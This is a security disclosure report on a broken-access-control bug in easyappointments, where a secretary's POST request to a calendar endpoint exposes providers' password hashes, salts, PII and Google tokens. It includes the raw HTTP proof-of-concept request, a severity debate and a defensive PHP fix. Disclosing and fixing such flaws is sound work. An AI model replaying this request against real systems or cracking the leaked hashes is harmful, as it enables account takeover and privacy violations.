Account Takeover in alextselegidis/easyappointments
Reported on
May 11th 2022
Description
In this case I found that an API endpoint is leaking the password and username.
Proof of Concept
- An admin adds a new secretary with access to providers.
- The secretary sends a POST request to the https://demo.easyappointments.org/index.php/backend_api/ajax_get_calendar_appointments endpoint.
- If the selected provider does not have any appointments, it returns a blank response; otherwise we receive a response with the username, email and password of the selected provider.
- Now, even if the provider does not have any appointments, a secretary can create a new appointment, after which the secretary will receive the username and password (password in hash format).
PoC.js: as the secretary, send the following POST request:
POST /index.php/backend_api/ajax_get_calendar_appointments HTTP/1.1
Host: demo.easyappointments.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: https://demo.easyappointments.org
DNT: 1
Connection: keep-alive
Referer: https://demo.easyappointments.org/index.php/backend
Cookie: csrfCookie=94313c542d7e676eafd5ea15c6925c73; ea_session=tcsbtn08c5bqfh718opvjur7imeqvaag
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Impact
Account takeover
Hello! Thanks for posting this.
I can replicate the issue and agree this data should not be visible.
On the other side, this is only something a logged-in user may see, and the password is hashed.
The upcoming 1.5 release will hide the password from the provider payload.
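The maintainer's fix above drops the password from the provider payload. As an added illustration (not Easy!Appointments code; the column and field names are assumptions modelled on what the report lists), here is an allow-list serializer for the provider record nested in each calendar appointment, which excludes hash, salt, token and contact details by default rather than relying on a deny-list of known-bad columns:

```php
<?php
// Added example, not Easy!Appointments code. Column names are assumptions
// modelled on the report (username, password hash, salt, phone, address,
// Google token); the real schema may differ.
//
// Behaviour the report describes: the raw provider row is embedded in each
// appointment of the calendar response, hash and salt included. The
// hardened form below replaces it with an allow-listed subset, so any
// sensitive column added to the table later is also excluded by default.
function provider_public_view(array $provider): array
{
    $allowed = array_flip(['id', 'first_name', 'last_name', 'email']);
    return array_intersect_key($provider, $allowed);
}

function calendar_appointments_safe(array $appointments): array
{
    foreach ($appointments as &$appointment) {
        if (isset($appointment['provider'])) {
            $appointment['provider'] = provider_public_view($appointment['provider']);
        }
    }
    unset($appointment); // break the reference left by foreach
    return $appointments;
}

// Constructed sample data with fake values.
$appointments = [[
    'id' => 42,
    'start_datetime' => '2022-05-11 10:00:00',
    'provider' => [
        'id' => 7, 'first_name' => 'Jane', 'last_name' => 'Doe',
        'email' => 'jane@example.invalid', 'phone_number' => '+1 555 0100',
        'address' => '1 Example St', 'username' => 'jane',
        'password' => '<fake hash>', 'salt' => '<fake salt>',
        'google_token' => '<fake token>',
    ],
]];

$safe = calendar_appointments_safe($appointments);
foreach (['password', 'salt', 'google_token', 'phone_number', 'address'] as $secret) {
    assert(!array_key_exists($secret, $safe[0]['provider']));
}
echo json_encode($safe, JSON_PRETTY_PRINT), PHP_EOL;
```

Run with `php -d zend.assertions=1 example.php` so the assertions are evaluated; the printed JSON shows only the four allow-listed provider fields.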
Hi, I want to know how you calculated the severity. Since we don't need user interaction and we require only low privileges as a user, I think high severity is appropriate for this report. Can you please take a look at this?
Hi, I also want to mention that this endpoint also shows PII (Personally Identifiable Information) of the user, including phone number, email address and address of the user, plus the Google token, and we also get the hash and salt of the encrypted password, so even a simple brute-force attack using that hash and salt will help to crack the password easily. As PII disclosure alone has P2 High severity, I think this report should be considered high severity.
Hi @admin, can you please help us to determine the severity of this issue?
@gaurav-g2 - it is up to the maintainer how severe they think the security issue to be. We try not to take a position on this, as we believe the maintainer is best placed to make this assessment. I would recommend waiting to hear back from the maintainer and continuing a respectful dialogue about the impact of the vulnerability 👍